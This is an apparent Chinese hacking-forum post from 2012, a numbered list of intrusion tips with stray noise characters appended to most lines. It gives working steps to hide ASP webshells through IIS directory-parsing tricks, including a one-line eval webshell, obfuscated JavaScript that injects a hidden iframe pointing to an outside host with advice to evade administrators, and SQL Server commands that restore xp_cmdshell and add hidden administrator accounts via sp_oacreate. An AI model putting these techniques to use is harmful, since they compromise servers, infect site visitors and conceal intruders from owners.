5 v3 g, c7 T/ O" ~$ J5 G) |执行后可以用AT命令查看新加的任务) R3 e$ n# V. ~& Y. C
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
. q% T$ i+ v) v0 a9 j, h# |/ U
6 r6 x1 ^; Y+ V8 `7 z2 r7 p( t3 `53、隐藏ASP后门的两种方法
8 l; t: `: e# l A1、建立非标准目录:mkdir images..\
: F1 g9 h! C8 L4 N0 B8 ]. g4 m% h拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp% [/ C% N0 `: ^- W: x! \
通过web访问ASP木马:http://ip/images../news.asp?action=login
+ Y/ M4 D+ q1 |8 s$ Y3 F如何删除非标准目录:rmdir images..\ /s2 k9 D, Q, |' K. u
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:# J2 O" s& ~4 v1 G9 B9 w* _
mkdir programme.asp2 }4 s* E: {# w* b' m7 M" A' x; h" O
新建1.txt文件内容:<!--#include file=”12.jpg”-->! i! q" ]; [( E" m% `0 i' j- d
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
6 u/ D# u, c% w1 z0 d, I! }) lattrib +H +S programme.asp
9 `/ Q2 f1 P' R* N$ e Y通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ o* D7 g2 ~( G, i5 N) E# I6 D% ?; t- e! s- K
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
6 h6 Q/ D4 ^+ ]" J& a然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
$ g% K. J R# R% `! z# B# g W) M" D7 H- F+ a
55、JS隐蔽挂马' ~ `( e" K& _. ~+ }. Z
1.
% d# [4 c/ Y; R9 f( A! }( f% Dvar tr4c3="<iframe src=ht";
" C5 B, j }+ D2 Atr4c3 = tr4c3+"tp:/";
2 Y; `; T- Q9 ctr4c3 = tr4c3+"/ww";
; b/ d6 i. _& J* n: @& u/ wtr4c3 = tr4c3+"w.tr4";
' e$ ^8 G" A1 M9 { |2 @# ctr4c3 = tr4c3+"c3.com/inc/m";; l9 e0 \+ g: o+ w; G* ]
tr4c3 = tr4c3+"m.htm style="display:none"></i";% @5 u& \* J! G
tr4c3 =tr4c3+"frame>'";
+ X ?8 I$ } b" T+ hdocument.write(tr4c3);% V2 Y( @. w3 F6 u% Q
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。6 e( c& }- H: Z6 C7 T
' `4 H' W. ^/ [
2.
" Z# d3 K: W6 I" ^) S+ z! Y# T转换进制,然后用EVAL执行。如
3 @% Q5 k8 h4 T9 S/ n% ^7 u1 Yeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
& P. {& q2 W) w不过这个有点显眼。
2 r d: L9 H. R8 O) e3.
N# f$ K6 L8 C/ Ddocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
6 _, K" y; n; d) v最后一点,别忘了把文件的时间也修改下。6 V: Z; N6 i( f1 [0 ?
7 Z [0 g& ~& s; d
56.3389终端入侵常用DOS命令
# f' L7 s. f9 etaskkill taskkill /PID 1248 /t- C( A8 c4 O1 e9 ]" o8 R$ m" f
/ T1 P1 i7 I6 u( z4 E8 B0 ~# [. ], ?
tasklist 查进程
+ M, V8 a- w: _% n
! j, g# A0 s* m1 |% hcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. r2 ^9 t& |) `- \/ K2 }# miisreset /reboot
4 c" O- R. F: y+ ?tsshutdn /reboot /delay:1 重起服务器
: p4 k- S+ B8 Q [6 J# L# {$ x
# ^ R" ?5 B* t9 f/ Mlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
; R' p: }0 g/ X( x2 u( m7 W9 F# r+ m8 `
query user 查看当前终端用户在线情况
$ @9 v" N( ]: {3 |1 U
/ R! ~' k( l( `5 O9 e; U" b" T6 f要显示有关所有会话使用的进程的信息,请键入:query process *
x0 }. N' H$ D3 x) x$ g! J
' S/ J2 g; v) @9 t2 _要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
) P* l* t( u0 V5 Z4 C" u) O* c* j3 R7 i/ }* v5 s$ C! \
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2; h' m2 y# z$ h8 }4 \" t. Q$ @5 W
! j. y) W7 X3 E
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
8 H {5 s; ?0 c9 K% d1 D( L) |
0 `% Z2 k4 T7 N; M2 q! }命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启% k7 Z6 f; ]2 ^% R6 H
$ q# H$ W" r( U- |! e
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
$ T4 C. W5 ~$ R5 `# c& @1 C0 b, y4 B) B$ l" B2 v6 n
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。& {" Z$ o( Q5 ]/ w
# S; r. {! j$ ^9 B! O( a& Q命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机! O/ x2 X5 \4 o- J" e" w$ c5 c: Z
; k7 a) M5 U1 ]7 \4 y/ s. `. ]+ I9 ^56、在地址栏或按Ctrl+O,输入:/ M6 t% F6 g9 v8 }* s6 Y7 N
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;& c0 m* N9 @& S5 g) |2 g% [
' n- {# h8 r, y6 P源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。# G5 C% s+ \3 ^( F
& t+ d h2 I5 v7 e" H, Z57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' }- K' s! K' o, |& s2 h0 d用net localgroup administrators是可以看到管理组下,加了$的用户的。$ R. `8 ]8 S3 ~6 q$ V5 K
" v8 Z+ b' B' \
58、 sa弱口令相关命令1 [# g. P8 z9 J' f8 k
; Q5 O) ^' {! c7 F
一.更改sa口令方法:; p/ [% N9 ]% F* ~" l
用sql综合利用工具连接后,执行命令:
" D! |9 f3 v8 D! T: Hexec sp_password NULL,'20001001','sa'
* D* x3 w* x) a(提示:慎用!)7 K5 Y$ w: w" s5 ?" y
, w9 p5 z# s% {6 \, s1 F/ e
二.简单修补sa弱口令.
4 O. }( `# k; D. d7 \
" E. v5 b. \: I方法1:查询分离器连接后执行:
7 ^8 Z( h, h0 |- d. _if exists (select * from
/ R" p! g w1 t- N0 V1 odbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
% r ~# R/ D1 ]0 z. POBJECTPROPERTY(id, N'IsExtendedProc') = 1)) t) _! T5 o7 d% x: W# g
7 p! s9 O8 |! V1 Texec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
! m+ R; q. e" g5 p) m" {# }8 T
+ D, f$ U- k& q$ `4 M% k( lGO
5 }* O( T/ D% _ L1 ~9 J& q6 a. U& I' y U
然后按F5键命令执行完毕
/ e8 ] @! R5 X+ r& H7 U
4 M Q* \: S8 q N- N方法2:查询分离器连接后& s4 a4 p6 v. l1 ^9 P0 R0 ^
第一步执行:use master4 d2 @4 I0 e% d$ Q* s3 Y7 [
第二步执行:sp_dropextendedproc 'xp_cmdshell'& p! B: W0 o7 _/ X
然后按F5键命令执行完毕; l* G9 Z+ v9 R! J
) Y; r/ g( S, ]% \6 n$ U7 \7 z) k: x
三.常见情况恢复执行xp_cmdshell.! N! A% t v% f
+ J5 r8 R8 r- l# b, G; P1 w6 v, I- n& S9 f; \# Q9 D y
1 未能找到存储过程'master..xpcmdshell'.1 g5 B# M$ P& X0 G/ V/ ^0 U6 Z: g: r
恢复方法:查询分离器连接后, S1 S# g1 |" R2 j7 c4 l1 b n. G* i
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
3 C$ \% b4 E1 O2 W8 b1 D5 A第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% |. p# K$ c" u* l& m* o然后按F5键命令执行完毕5 l$ J# d7 N+ m8 W+ ^
; G8 M' c+ `% ]0 a7 d: S2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)2 [8 G3 ~9 d# x h
恢复方法:查询分离器连接后,
" h& f: O' Z8 d9 n7 Y3 _( K第一步执行:sp_dropextendedproc "xp_cmdshell"
/ b) U I: V: q第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'* t8 d# F, G- q3 Z3 Q5 O$ k
然后按F5键命令执行完毕
# Z2 b* } P* Q h. O- j. k& D8 ~( v) P+ s; ]
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
0 Z8 @/ b4 X3 h, L恢复方法:查询分离器连接后,6 F( i5 a# p' \
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'; E* ?9 Z: R$ j& l; Y
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
; y0 s9 {$ S, E6 L9 N9 @) e然后按F5键命令执行完毕
- l+ l- h0 Z) y) a6 r+ P" H8 ]; a" f
" J$ `2 l4 [9 p. g1 e3 A2 `四.终极方法.
: X7 V. L- x- V4 C& j如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
7 l% M0 M3 R( \ M- Z2 u( {查询分离器连接后,
) R6 X& e# S6 a: {2000servser系统:
- p5 I; c% u6 M8 `& h% w) l2 wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
2 A5 u& ]0 s( C5 E9 v( u0 d7 y5 E/ M- u5 l8 m8 ?" p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 L' Y5 o8 Q0 e( `% i% c2 J
3 K) i: n. f5 V% d: Q8 hxp或2003server系统:
( H' z6 O. F. r6 l
, S5 _3 p) B" A' h4 U' j6 F( A' Kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'& W# x7 m1 L$ ^$ Z
( K5 B# X I% [! i" i: p. R5 T2 G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'1 D* |2 x. N9 [3 ^" F& a
|
发表于 2012-9-15 14:13:15
收藏
支持
反对